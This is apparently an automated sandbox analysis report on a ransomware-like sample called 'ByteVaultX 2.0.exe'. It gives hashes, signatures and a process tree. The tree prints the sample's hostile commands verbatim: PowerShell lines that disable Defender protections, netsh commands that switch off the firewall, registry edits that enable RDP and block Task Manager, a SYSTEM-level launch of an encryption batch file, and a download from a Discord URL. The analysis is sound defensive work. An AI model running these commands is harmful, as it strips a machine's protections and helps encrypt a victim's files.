Analysis
-
max time kernel
150s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
25/05/2024, 23:21
Behavioral task
behavioral1
Sample
ByteVaultX 2.0.exe
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
ByteVaultX 2.0.exe
Resource
win7-20240419-en
Behavioral task
behavioral3
Sample
ByteVaultX 2.0.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral4
Sample
ByteVaultX 2.0.exe
Resource
win11-20240508-en
General
-
Target
ByteVaultX 2.0.exe
-
Size
9.9MB
-
MD5
72c65f1b271ae812c9c00fe7dbef3ee7
-
SHA1
98327e138efdcdbfcb02787ad3f9b729e617df6e
-
SHA256
d1314cc2b3ddd84224b7b6fe78c9ca75dceed34799b6715086eeacd687e84017
-
SHA512
21595d8bc9fe4c94a74b28acbe65e9a98f2c39e23d9e41bb5bfcaae01f11c11bfade391f04edd5853081c4ab1df051aa6f71c6203d7eac39b3446a3e357be273
-
SSDEEP
196608:Th30RIk7AHkPkRJW9GNZA1HeT39Iig6eE9TFa0Z8DOjCdylNo1nz8QW7tx:mGFG8S1+TtIi+Y9Z8D8CclydoPx
Malware Config
Extracted
https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&
Signatures
-
Renames multiple (143) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Blocklisted process makes network request 15 IoCs
flow pid Process 78 4552 powershell.exe 80 440 powershell.exe 91 4804 powershell.exe 92 4628 powershell.exe 96 4332 powershell.exe 101 4116 powershell.exe 109 1928 powershell.exe 110 2008 powershell.exe 116 3208 powershell.exe 117 512 powershell.exe 131 3964 powershell.exe 133 4880 powershell.exe 134 4396 powershell.exe 135 2776 powershell.exe 136 2844 powershell.exe -
Disables Task Manager via registry modification
-
Modifies Windows Firewall 2 TTPs 64 IoCs
pid Process 3412 netsh.exe 4684 netsh.exe 4116 netsh.exe 3980 netsh.exe 5032 netsh.exe 64 netsh.exe 3560 netsh.exe 3360 netsh.exe 1708 netsh.exe 3052 netsh.exe 3088 netsh.exe 2700 netsh.exe 4628 netsh.exe 208 netsh.exe 3208 netsh.exe 3956 netsh.exe 1496 netsh.exe 1804 netsh.exe 1048 netsh.exe 4824 netsh.exe 3468 netsh.exe 440 netsh.exe 208 netsh.exe 4736 netsh.exe 4352 netsh.exe 2076 netsh.exe 3196 netsh.exe 4816 netsh.exe 3484 netsh.exe 2700 netsh.exe 3056 netsh.exe 1084 netsh.exe 2516 netsh.exe 1084 netsh.exe 4904 netsh.exe 4224 netsh.exe 452 netsh.exe 4292 netsh.exe 4280 netsh.exe 64 netsh.exe 4352 netsh.exe 4800 netsh.exe 3780 netsh.exe 3196 netsh.exe 5012 netsh.exe 2796 netsh.exe 4752 netsh.exe 4168 netsh.exe 2136 netsh.exe 3468 netsh.exe 3792 netsh.exe 1928 netsh.exe 4684 netsh.exe 4568 netsh.exe 3576 netsh.exe 1804 netsh.exe 4224 netsh.exe 3176 netsh.exe 1540 netsh.exe 3728 netsh.exe 3052 netsh.exe 1804 netsh.exe 1928 netsh.exe 1800 netsh.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation ByteVaultX 2.0.exe -
Loads dropped DLL 12 IoCs
pid Process 1036 ByteVaultX 2.0.exe 1036 ByteVaultX 2.0.exe 1036 ByteVaultX 2.0.exe 1036 ByteVaultX 2.0.exe 1036 ByteVaultX 2.0.exe 1036 ByteVaultX 2.0.exe 1036 ByteVaultX 2.0.exe 1036 ByteVaultX 2.0.exe 1036 ByteVaultX 2.0.exe 1036 ByteVaultX 2.0.exe 1036 ByteVaultX 2.0.exe 1036 ByteVaultX 2.0.exe -
Drops desktop.ini file(s) 8 IoCs
description ioc Process File opened for modification C:\Users\Admin\Pictures\desktop.ini ByteVaultX 2.0.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini ByteVaultX 2.0.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini ByteVaultX 2.0.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini ByteVaultX 2.0.exe File opened for modification C:\Users\Admin\Music\desktop.ini ByteVaultX 2.0.exe File opened for modification C:\Users\Admin\Videos\desktop.ini ByteVaultX 2.0.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini ByteVaultX 2.0.exe File opened for modification C:\Users\Admin\Documents\desktop.ini ByteVaultX 2.0.exe -
pid Process 2844 powershell.exe 3792 powershell.exe 4348 powershell.exe 4332 powershell.exe 748 powershell.exe 2796 powershell.exe 3468 powershell.exe 4552 powershell.exe 3956 powershell.exe 5016 powershell.exe 4168 powershell.exe 2012 powershell.exe 5052 powershell.exe 1184 powershell.exe 3516 powershell.exe 5032 powershell.exe 2512 powershell.exe 4520 powershell.exe 400 powershell.exe 4396 powershell.exe 2208 powershell.exe 2796 powershell.exe 4480 powershell.exe 1552 powershell.exe 4332 powershell.exe 3796 powershell.exe 4224 powershell.exe 2308 powershell.exe 1928 powershell.exe 3540 powershell.exe 3984 powershell.exe 752 powershell.exe 3860 powershell.exe 1356 powershell.exe 4168 powershell.exe 4256 powershell.exe 208 powershell.exe 1552 powershell.exe 4160 powershell.exe 3796 powershell.exe 1716 powershell.exe 404 powershell.exe 5016 powershell.exe 440 powershell.exe 404 powershell.exe 1032 powershell.exe 1928 powershell.exe 4816 powershell.exe 2272 powershell.exe 3612 powershell.exe 316 powershell.exe 936 powershell.exe 1092 powershell.exe 4160 powershell.exe 2180 powershell.exe 1552 powershell.exe 4256 powershell.exe 2308 powershell.exe 4512 powershell.exe 440 powershell.exe 2796 powershell.exe 1912 powershell.exe 5048 powershell.exe 4396 powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 15 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 15 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1356 powershell.exe 1356 powershell.exe 1356 powershell.exe 1160 powershell.exe 1160 powershell.exe 1160 powershell.exe 5116 powershell.exe 5116 powershell.exe 5116 powershell.exe 3196 powershell.exe 3196 powershell.exe 3196 powershell.exe 1524 powershell.exe 1524 powershell.exe 1524 powershell.exe 5020 powershell.exe 5020 powershell.exe 5020 powershell.exe 4312 powershell.exe 4312 powershell.exe 4312 powershell.exe 2076 powershell.exe 2076 powershell.exe 2076 powershell.exe 2208 powershell.exe 2208 powershell.exe 2208 powershell.exe 1764 powershell.exe 1764 powershell.exe 1764 powershell.exe 2180 powershell.exe 2180 powershell.exe 2180 powershell.exe 3996 powershell.exe 3996 powershell.exe 3996 powershell.exe 4552 powershell.exe 4552 powershell.exe 4552 powershell.exe 4332 powershell.exe 4332 powershell.exe 4332 powershell.exe 1496 powershell.exe 1496 powershell.exe 1496 powershell.exe 3612 powershell.exe 3612 powershell.exe 3612 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 2272 powershell.exe 2272 powershell.exe 2272 powershell.exe 3232 powershell.exe 3232 powershell.exe 3232 powershell.exe 316 powershell.exe 316 powershell.exe 316 powershell.exe 3360 powershell.exe 3360 powershell.exe 3360 powershell.exe 4256 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1356 powershell.exe Token: SeDebugPrivilege 1160 powershell.exe Token: SeDebugPrivilege 5116 powershell.exe Token: SeDebugPrivilege 3196 powershell.exe Token: SeDebugPrivilege 1524 powershell.exe Token: SeDebugPrivilege 5020 powershell.exe Token: SeDebugPrivilege 4312 powershell.exe Token: SeDebugPrivilege 2076 powershell.exe Token: SeDebugPrivilege 2208 powershell.exe Token: SeDebugPrivilege 1764 powershell.exe Token: SeDebugPrivilege 2180 powershell.exe Token: SeDebugPrivilege 3996 powershell.exe Token: SeDebugPrivilege 4552 powershell.exe Token: SeDebugPrivilege 4332 powershell.exe Token: SeDebugPrivilege 1496 powershell.exe Token: SeDebugPrivilege 3612 powershell.exe Token: SeDebugPrivilege 1328 powershell.exe Token: SeDebugPrivilege 2272 powershell.exe Token: SeDebugPrivilege 3232 powershell.exe Token: SeDebugPrivilege 316 powershell.exe Token: SeDebugPrivilege 3360 powershell.exe Token: SeDebugPrivilege 4256 powershell.exe Token: SeDebugPrivilege 2796 powershell.exe Token: SeDebugPrivilege 4332 powershell.exe Token: SeDebugPrivilege 440 powershell.exe Token: SeDebugPrivilege 748 powershell.exe Token: SeDebugPrivilege 316 powershell.exe Token: SeDebugPrivilege 1552 powershell.exe Token: SeDebugPrivilege 4648 powershell.exe Token: SeDebugPrivilege 2076 powershell.exe Token: SeDebugPrivilege 2308 powershell.exe Token: SeDebugPrivilege 4116 powershell.exe Token: SeDebugPrivilege 3984 powershell.exe Token: SeDebugPrivilege 2308 powershell.exe Token: SeDebugPrivilege 3944 powershell.exe Token: SeDebugPrivilege 1000 powershell.exe Token: SeDebugPrivilege 4804 powershell.exe Token: SeDebugPrivilege 2796 powershell.exe Token: SeDebugPrivilege 2700 powershell.exe Token: SeDebugPrivilege 2208 powershell.exe Token: SeDebugPrivilege 4804 powershell.exe Token: SeDebugPrivilege 4028 powershell.exe Token: SeDebugPrivilege 316 powershell.exe Token: SeDebugPrivilege 4256 powershell.exe Token: SeDebugPrivilege 1716 powershell.exe Token: SeDebugPrivilege 4144 powershell.exe Token: SeDebugPrivilege 2796 powershell.exe Token: SeDebugPrivilege 4268 powershell.exe Token: SeDebugPrivilege 2872 powershell.exe Token: SeDebugPrivilege 4628 powershell.exe Token: SeDebugPrivilege 5016 powershell.exe Token: SeDebugPrivilege 404 powershell.exe Token: SeDebugPrivilege 3924 powershell.exe Token: SeDebugPrivilege 4480 powershell.exe Token: SeDebugPrivilege 1328 powershell.exe Token: SeDebugPrivilege 4324 powershell.exe Token: SeDebugPrivilege 2604 powershell.exe Token: SeDebugPrivilege 5016 powershell.exe Token: SeDebugPrivilege 4480 powershell.exe Token: SeDebugPrivilege 3516 powershell.exe Token: SeDebugPrivilege 1544 powershell.exe Token: SeDebugPrivilege 2308 powershell.exe Token: SeDebugPrivilege 4332 powershell.exe Token: SeDebugPrivilege 2844 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4660 wrote to memory of 1036 4660 ByteVaultX 2.0.exe 90 PID 4660 wrote to memory of 1036 4660 ByteVaultX 2.0.exe 90 PID 1036 wrote to memory of 1356 1036 ByteVaultX 2.0.exe 104 PID 1036 wrote to memory of 1356 1036 ByteVaultX 2.0.exe 104 PID 1036 wrote to memory of 3780 1036 ByteVaultX 2.0.exe 107 PID 1036 wrote to memory of 3780 1036 ByteVaultX 2.0.exe 107 PID 1036 wrote to memory of 3560 1036 ByteVaultX 2.0.exe 111 PID 1036 wrote to memory of 3560 1036 ByteVaultX 2.0.exe 111 PID 1036 wrote to memory of 2180 1036 ByteVaultX 2.0.exe 113 PID 1036 wrote to memory of 2180 1036 ByteVaultX 2.0.exe 113 PID 1036 wrote to memory of 2068 1036 ByteVaultX 2.0.exe 114 PID 1036 wrote to memory of 2068 1036 ByteVaultX 2.0.exe 114 PID 2068 wrote to memory of 3868 2068 cmd.exe 120 PID 2068 wrote to memory of 3868 2068 cmd.exe 120 PID 2068 wrote to memory of 1336 2068 cmd.exe 121 PID 2068 wrote to memory of 1336 2068 cmd.exe 121 PID 2068 wrote to memory of 1916 2068 cmd.exe 122 PID 2068 wrote to memory of 1916 2068 cmd.exe 122 PID 2068 wrote to memory of 1800 2068 cmd.exe 123 PID 2068 wrote to memory of 1800 2068 cmd.exe 123 PID 2068 wrote to memory of 1160 2068 cmd.exe 124 PID 2068 wrote to memory of 1160 2068 cmd.exe 124 PID 2068 wrote to memory of 5116 2068 cmd.exe 125 PID 2068 wrote to memory of 5116 2068 cmd.exe 125 PID 2068 wrote to memory of 3196 2068 cmd.exe 126 PID 2068 wrote to memory of 3196 2068 cmd.exe 126 PID 2068 wrote to memory of 1524 2068 cmd.exe 128 PID 2068 wrote to memory of 1524 2068 cmd.exe 128 PID 2068 wrote to memory of 5020 2068 cmd.exe 129 PID 2068 wrote to memory of 5020 2068 cmd.exe 129 PID 2068 wrote to memory of 1336 2068 cmd.exe 130 PID 2068 wrote to memory of 1336 2068 cmd.exe 130 PID 2068 wrote to memory of 2700 2068 cmd.exe 131 PID 2068 wrote to memory of 2700 2068 cmd.exe 131 PID 2068 wrote to memory of 4352 2068 cmd.exe 132 PID 2068 wrote to memory of 4352 2068 cmd.exe 132 PID 2068 wrote to memory of 1800 2068 cmd.exe 133 PID 2068 wrote to memory of 1800 2068 cmd.exe 133 PID 2068 wrote to memory of 1496 2068 cmd.exe 134 PID 2068 wrote to memory of 1496 2068 cmd.exe 134 PID 2068 wrote to memory of 4628 2068 cmd.exe 135 PID 2068 wrote to memory of 4628 2068 cmd.exe 135 PID 2068 wrote to memory of 3560 2068 cmd.exe 136 PID 2068 wrote to memory of 3560 2068 cmd.exe 136 PID 2068 wrote to memory of 4312 2068 cmd.exe 137 PID 2068 wrote to memory of 4312 2068 cmd.exe 137 PID 2068 wrote to memory of 2076 2068 cmd.exe 138 PID 2068 wrote to memory of 2076 2068 cmd.exe 138 PID 2068 wrote to memory of 2208 2068 cmd.exe 139 PID 2068 wrote to memory of 2208 2068 cmd.exe 139 PID 2068 wrote to memory of 1764 2068 cmd.exe 140 PID 2068 wrote to memory of 1764 2068 cmd.exe 140 PID 2068 wrote to memory of 2180 2068 cmd.exe 141 PID 2068 wrote to memory of 2180 2068 cmd.exe 141 PID 2068 wrote to memory of 3996 2068 cmd.exe 142 PID 2068 wrote to memory of 3996 2068 cmd.exe 142 PID 2068 wrote to memory of 4552 2068 cmd.exe 143 PID 2068 wrote to memory of 4552 2068 cmd.exe 143 PID 2068 wrote to memory of 4332 2068 cmd.exe 144 PID 2068 wrote to memory of 4332 2068 cmd.exe 144 PID 4332 wrote to memory of 4504 4332 powershell.exe 145 PID 4332 wrote to memory of 4504 4332 powershell.exe 145 PID 2068 wrote to memory of 748 2068 cmd.exe 147 PID 2068 wrote to memory of 748 2068 cmd.exe 147
Processes
-
C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4660 -
C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"2⤵
- Checks computer location settings
- Loads dropped DLL
- Drops desktop.ini file(s)
- Suspicious use of WriteProcessMemory
PID:1036 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1356
-
-
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
PID:3780
-
-
C:\Windows\SYSTEM32\runas.exerunas /user:NT-AUTORITÄT\SYSTEM cmd.exe /c "C:\Encrypt\encrypt.bat"3⤵PID:3560
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Encrypt\encrypt.html3⤵PID:2180
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Encrypt\encrypt.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:2068 -
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"4⤵PID:3868
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f4⤵PID:1336
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"4⤵PID:1916
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f4⤵PID:1800
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1160
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5116
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3196
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1524
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5020
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable4⤵PID:1336
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE4⤵
- Modifies Windows Firewall
PID:2700
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off4⤵
- Modifies Windows Firewall
PID:4352
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off4⤵
- Modifies Windows Firewall
PID:1800
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off4⤵
- Modifies Windows Firewall
PID:1496
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off4⤵
- Modifies Windows Firewall
PID:4628
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off4⤵
- Modifies Windows Firewall
PID:3560
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4312
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2076
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2208
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1764
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2180
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3996
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4552
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"4⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4332 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"5⤵PID:4504
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"6⤵PID:5032
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f6⤵PID:452
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"6⤵PID:2208
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f6⤵PID:2700
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1496
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3612
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1328
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2272
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3232
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable6⤵PID:2700
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE6⤵
- Modifies Windows Firewall
PID:2076
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off6⤵
- Modifies Windows Firewall
PID:3412
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off6⤵PID:4880
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off6⤵PID:4324
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off6⤵
- Modifies Windows Firewall
PID:5012
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off6⤵PID:2208
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:316
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3360
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4256
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"6⤵PID:220
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2796
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4332
-
-
